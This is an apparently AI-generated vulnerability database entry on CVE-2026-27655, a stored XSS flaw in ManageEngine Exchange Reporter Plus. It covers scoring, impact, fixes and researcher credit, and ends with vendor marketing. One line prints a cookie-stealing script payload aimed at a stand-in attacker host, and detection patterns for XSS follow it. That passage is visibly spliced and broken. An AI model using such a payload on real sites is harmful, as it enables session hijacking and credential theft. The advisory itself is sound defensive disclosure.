
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-27655 is a Stored Cross-Site Scripting (XSS) vulnerability in Zohocorp ManageEngine Exchange Reporter Plus affecting all builds prior to version 5802 (including builds 5800 and 5801). The flaw resides in the "Permissions Based on Mailboxes" report within the Reports module, allowing an authenticated attacker with Exchange administrative privileges to inject persistent malicious scripts. The vulnerability was fixed on March 19, 2026, and publicly disclosed on April 3, 2026 (ManageEngine Advisory, GitHub Advisory). The CVSS v3.1 base score is reported as 4.8 (Medium) by NVD and 7.3 (High) by the GitHub Advisory Database, reflecting differing assessments of privilege requirements and scope (GitHub Advisory).
The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), arising from insufficient input validation in the Permissions Based on Mailboxes report (ManageEngine Advisory). An authenticated attacker with Exchange administrative privileges can inject malicious script content into report data fields; this content is stored server-side and rendered without proper sanitization when other users view the affected report. The attack vector is network-based, requires low-to-high privileges (depending on scoring source) and user interaction from a victim, and results in script execution within the victim's browser context (GitHub Advisory). The fix was implemented in build 5802 by adding proper input validation to the affected report component (ManageEngine Advisory).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser context of any user who accesses the compromised Permissions Based on Mailboxes report, potentially including other administrators. This can lead to session hijacking, credential theft, unauthorized actions performed on behalf of the victim within Exchange Reporter Plus, and manipulation of mailbox permissions data (ManageEngine Advisory, GitHub Advisory). The confidentiality and integrity of the application are both at high risk, though availability is not directly impacted.
There is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation at this time (GitHub Advisory). The EPSS score is approximately 0.016–0.021%, placing it in the 6th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker with Exchange administrative privileges and a victim user who interacts with the affected report, limiting the practical attack surface.
<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or an event-handler-based variant.<script>, onerror=, javascript:) within stored report data or database fields associated with the Permissions Based on Mailboxes report.Zohocorp has released Exchange Reporter Plus build 5802, which resolves this vulnerability by implementing proper input validation in the affected report component; all users on builds 5801 and below should update immediately using the available service pack (ManageEngine Advisory). As an interim workaround prior to patching, restrict access to the Permissions Based on Mailboxes report to trusted administrators only and monitor report access logs for suspicious activity. Additionally, implementing Content Security Policy (CSP) headers on the Exchange Reporter Plus web interface can help reduce the impact of any XSS exploitation.
The vulnerability was reported to Zohocorp by security researcher "C311" through the Zoho BugBounty program, and Zohocorp credited the researcher in their official advisory (ManageEngine Advisory). No significant broader industry commentary, social media discussion, or media coverage has been identified for this vulnerability beyond standard CVE aggregator listings.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."